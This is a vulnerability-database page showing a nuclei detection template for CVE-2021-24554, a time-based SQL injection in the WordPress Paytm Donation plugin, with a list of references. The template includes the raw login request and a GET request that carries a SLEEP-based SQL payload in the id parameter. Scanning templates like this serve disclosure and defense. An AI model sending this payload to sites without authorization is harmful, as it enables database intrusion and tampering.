Lucene search
K

WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection, Risk of Data Modification and Unauthorized Acces

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24554
23 Aug 202116:23
circl
CNNVD
WordPress plugin SQL注入漏洞
23 Aug 202100:00
cnnvd
CVE
CVE-2021-24554
23 Aug 202111:10
cve
Cvelist
CVE-2021-24554 Paytm - Donation Plugin <= 1.3.2 - Authenticated (admin+) SQL Injection
23 Aug 202111:10
cvelist
NVD
CVE-2021-24554
23 Aug 202112:15
nvd
OSV
CVE-2021-24554
23 Aug 202112:15
osv
Patchstack
WordPress Paytm plugin <= 1.3.2 - Authenticated SQL Injection (SQLi) vulnerability
24 Jul 202100:00
patchstack
Prion
Sql injection
23 Aug 202112:15
prion
RedhatCVE
CVE-2021-24554
22 May 202519:22
redhatcve
wpexploit
Paytm - Donation Plugin <= 1.3.2 - Authenticated (admin+) SQL Injection
24 Jul 202100:00
wpexploit
Rows per page
id: CVE-2021-24554

info:
  name: WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection
  author: theamanrawat
  severity: high
  description: |
    WordPress Paytm Donation plugin through 1.3.2 is susceptible to authenticated SQL injection. The plugin does not sanitize, validate, or escape the id GET parameter before using it in a SQL statement when deleting donations. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
  remediation: |
    Update to the latest version of the WordPress Paytm Donation plugin (version > 1.3.2) to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/f2842ac8-76fa-4490-aa0c-5f2b07ecf2ad
    - https://wordpress.org/plugins/wp-paytm-pay/
    - https://codevigilant.com/disclosure/2021/wp-plugin-wp-paytm-pay/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24554
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24554
    cwe-id: CWE-89
    epss-score: 0.05691
    epss-percentile: 0.92052
    cpe: cpe:2.3:a:freelancetoindia:paytm-pay:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: freelancetoindia
    product: paytm-pay
    framework: wordpress
  tags: time-based-sqli,cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 10s
        GET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=6'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "paytm-settings_page_wp_paytm_donation")'
        condition: and
# digest: 4a0a00473045022100da545859139c37d0efa29865b2c6196fe233e640f7cef723bfc5b55d3065a998022037c682beb9e25afcb0198a7cf9f16b5f0a176aa58465da6e0144769169f31666:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 26.5
CVSS 3.17.2
EPSS0.05691
31